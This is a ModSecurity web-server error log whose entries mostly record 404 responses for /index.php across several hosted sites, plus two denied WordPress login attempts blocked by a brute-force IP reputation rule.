[Tue May 26 15:29:00.408166 2026] [security2:error] [pid 715645:tid 715782] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj79gAABx4"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.413074 2026] [security2:error] [pid 715645:tid 715737] [remote 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj76QAAYFs"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.414499 2026] [security2:error] [pid 715645:tid 715829] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj8BgAANkA"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.419254 2026] [security2:error] [pid 715645:tid 715865] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj8DwAAWiU"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.428849 2026] [security2:error] [pid 715645:tid 715818] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj75AAAKxA"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.429687 2026] [security2:error] [pid 715645:tid 715812] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj76wAAJRE"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.434995 2026] [security2:error] [pid 715645:tid 715821] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj78QAALiI"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.435111 2026] [security2:error] [pid 715645:tid 715891] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj8CAAAdFA"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.451956 2026] [security2:error] [pid 715645:tid 715863] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj7-AAAWCM"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.453756 2026] [security2:error] [pid 715645:tid 715838] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj76AAAP2Y"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.453927 2026] [security2:error] [pid 715645:tid 715890] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj7-QAAcy4"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.454377 2026] [security2:error] [pid 715645:tid 715896] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj7_gAAeSY"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.456829 2026] [security2:error] [pid 715645:tid 715831] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj8EAAAOCA"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.459656 2026] [security2:error] [pid 715645:tid 715887] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj7_wAAcCk"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.459955 2026] [security2:error] [pid 715645:tid 715830] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj76gAANw8"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.460001 2026] [security2:error] [pid 715645:tid 715848] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj8CgAASVE"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.461075 2026] [security2:error] [pid 715645:tid 715843] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj8AgAARC8"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.463701 2026] [security2:error] [pid 715645:tid 715833] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj78gAAOmM"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.466268 2026] [security2:error] [pid 715645:tid 715901] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj8AAAAfjM"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.475069 2026] [security2:error] [pid 715645:tid 715822] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj79QAALx0"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.482065 2026] [security2:error] [pid 715645:tid 715877] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj8AwAAZic"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.495813 2026] [security2:error] [pid 715645:tid 715897] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj8AQAAeig"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.497551 2026] [security2:error] [pid 715645:tid 715856] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj8CwAAUTA"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.503739 2026] [security2:error] [pid 715645:tid 715892] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj8EwAAdTU"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.509548 2026] [security2:error] [pid 715645:tid 715799] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj8GQAAABg"]
[Tue May 26 15:29:00.512506 2026] [security2:error] [pid 715645:tid 715852] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj7_QAATV0"], referer: https://ndequipments.com/used-tractors/?gad_source=5&gad_campaignid=23709856748&gclid=EAIaIQobChMIxP22x8GPlAMVnVBHAR0Wyy9REAAYAiAAEgKokvD_BwE
[Tue May 26 15:29:00.864682 2026] [security2:error] [pid 715645:tid 715806] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj8KwAAAB8"]
[Tue May 26 15:29:00.978699 2026] [security2:error] [pid 715645:tid 715795] [client 103.151.173.206:58317] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahVu5HVGgMGh8k213Rj8CQAAAD0"]
[Tue May 26 15:29:01.250124 2026] [security2:error] [pid 715645:tid 715835] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu5XVGgMGh8k213Rj8PAAAADw"]
[Tue May 26 15:29:01.734585 2026] [security2:error] [pid 715645:tid 715832] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu5XVGgMGh8k213Rj8SwAAADk"]
[Tue May 26 15:29:01.991429 2026] [security2:error] [pid 715645:tid 715879] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVu5XVGgMGh8k213Rj8SAAAAGg"]
[Tue May 26 15:29:02.244449 2026] [security2:error] [pid 715645:tid 715872] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu5nVGgMGh8k213Rj8WQAAAGE"]
[Tue May 26 15:29:02.616448 2026] [security2:error] [pid 715645:tid 715849] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu5nVGgMGh8k213Rj8ZgAAAEo"]
[Tue May 26 15:29:03.088331 2026] [security2:error] [pid 715645:tid 715805] [client 103.151.173.206:49021] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahVu5nVGgMGh8k213Rj8YwAAACM"]
[Tue May 26 15:29:03.328774 2026] [security2:error] [pid 715645:tid 715791] [client 91.230.225.132:59703] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu53VGgMGh8k213Rj8fQAAABA"]
[Tue May 26 15:29:03.828797 2026] [security2:error] [pid 715645:tid 715902] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVu53VGgMGh8k213Rj8gwAAAH8"]
[Tue May 26 15:29:03.852930 2026] [security2:error] [pid 715645:tid 715806] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu53VGgMGh8k213Rj8kgAAAB8"]
[Tue May 26 15:29:04.201694 2026] [security2:error] [pid 715645:tid 715811] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu6HVGgMGh8k213Rj8mAAAACQ"]
[Tue May 26 15:29:04.631475 2026] [security2:error] [pid 715645:tid 715819] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu6HVGgMGh8k213Rj8qwAAACw"]
[Tue May 26 15:29:05.002529 2026] [security2:error] [pid 715645:tid 715805] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu6HVGgMGh8k213Rj8vwAAAB4"]
[Tue May 26 15:29:05.358345 2026] [security2:error] [pid 715645:tid 715831] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu6XVGgMGh8k213Rj8yAAAADg"]
[Tue May 26 15:29:05.766403 2026] [security2:error] [pid 715645:tid 715831] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu6XVGgMGh8k213Rj82AAAADg"]
[Tue May 26 15:29:06.248137 2026] [security2:error] [pid 715645:tid 715870] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu6nVGgMGh8k213Rj85AAAAF8"]
[Tue May 26 15:29:06.629643 2026] [security2:error] [pid 715645:tid 715895] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu6nVGgMGh8k213Rj88AAAAHg"]
[Tue May 26 15:29:06.833882 2026] [security2:error] [pid 715645:tid 715875] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVu6nVGgMGh8k213Rj87QAAAGQ"]
[Tue May 26 15:29:07.046101 2026] [security2:error] [pid 715645:tid 715836] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu6nVGgMGh8k213Rj9AAAAAD0"]
[Tue May 26 15:29:07.435816 2026] [security2:error] [pid 715645:tid 715785] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu63VGgMGh8k213Rj9DwAAAAo"]
[Tue May 26 15:29:07.795576 2026] [security2:error] [pid 715645:tid 715896] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu63VGgMGh8k213Rj9GAAAAHk"]
[Tue May 26 15:29:08.120675 2026] [security2:error] [pid 715645:tid 715837] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu7HVGgMGh8k213Rj9KgAAAD4"]
[Tue May 26 15:29:08.465759 2026] [security2:error] [pid 715645:tid 715846] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu7HVGgMGh8k213Rj9MwAAAEc"]
[Tue May 26 15:29:08.832536 2026] [security2:error] [pid 715645:tid 715838] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu7HVGgMGh8k213Rj9QgAAAD8"]
[Tue May 26 15:29:09.067781 2026] [security2:error] [pid 715645:tid 715817] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVu7HVGgMGh8k213Rj9PwAAACo"]
[Tue May 26 15:29:09.160963 2026] [security2:error] [pid 715645:tid 715804] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu7XVGgMGh8k213Rj9SwAAAB0"]
[Tue May 26 15:29:09.861015 2026] [security2:error] [pid 715645:tid 715889] [client 103.151.173.206:46798] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahVu7XVGgMGh8k213Rj9UgAAABw"]
[Tue May 26 15:29:10.066958 2026] [security2:error] [pid 715645:tid 715852] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu7XVGgMGh8k213Rj9ZwAAAE0"]
[Tue May 26 15:29:10.152642 2026] [security2:error] [pid 715645:tid 715793] [client 62.60.130.233:56181] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "acacia.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahVu7XVGgMGh8k213Rj9YgAAABI"], referer: https://www.reddit.com/
[Tue May 26 15:29:10.500371 2026] [security2:error] [pid 715645:tid 715875] [client 62.60.130.233:52562] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "acacia.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahVu7nVGgMGh8k213Rj9cwAAAGQ"]
[Tue May 26 15:29:10.773341 2026] [security2:error] [pid 715645:tid 715815] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu7nVGgMGh8k213Rj9fwAAACg"]
[Tue May 26 15:29:11.164599 2026] [security2:error] [pid 715645:tid 715798] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu73VGgMGh8k213Rj9jwAAABc"]
[Tue May 26 15:29:11.329917 2026] [security2:error] [pid 715645:tid 715843] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVu7nVGgMGh8k213Rj9hQAAAEQ"]
[Tue May 26 15:29:11.614985 2026] [security2:error] [pid 715645:tid 715898] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu73VGgMGh8k213Rj9pQAAAHs"]
